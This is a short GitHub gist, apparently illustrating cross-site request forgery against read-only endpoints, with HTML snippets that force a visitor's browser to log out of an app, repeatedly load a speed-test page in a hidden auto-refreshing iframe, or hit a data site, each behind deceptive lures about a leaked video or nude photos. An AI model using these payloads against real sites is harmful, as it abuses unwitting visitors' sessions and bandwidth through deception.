Skip to content

Instantly share code, notes, and snippets.

@PiotrPodsiadly
Last active August 29, 2015 14:17
Show Gist options
  • Select an option

  • Save PiotrPodsiadly/e99e443b46ecade392d7 to your computer and use it in GitHub Desktop.

Select an option

Save PiotrPodsiadly/e99e443b46ecade392d7 to your computer and use it in GitHub Desktop.
CSRF for read only operations
<img src="http://my-app.com/logout"/>
<html>
<head>
<meta http-equiv="refresh" content="30">
</head>
<body>
<iframe src="http://popular-internet-speed-test.com/measure" class="hidden"/>
<h1>Please wait while we load Half-Life 3 leaked video!</h1>
Loading ... <img src="spinning-circle.gif"/>
</body>
</html>
<img src="http://stock-data-online.com/?show-all"/>
<h1>Refresh 10 times to view my GF nudes!</h1>
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment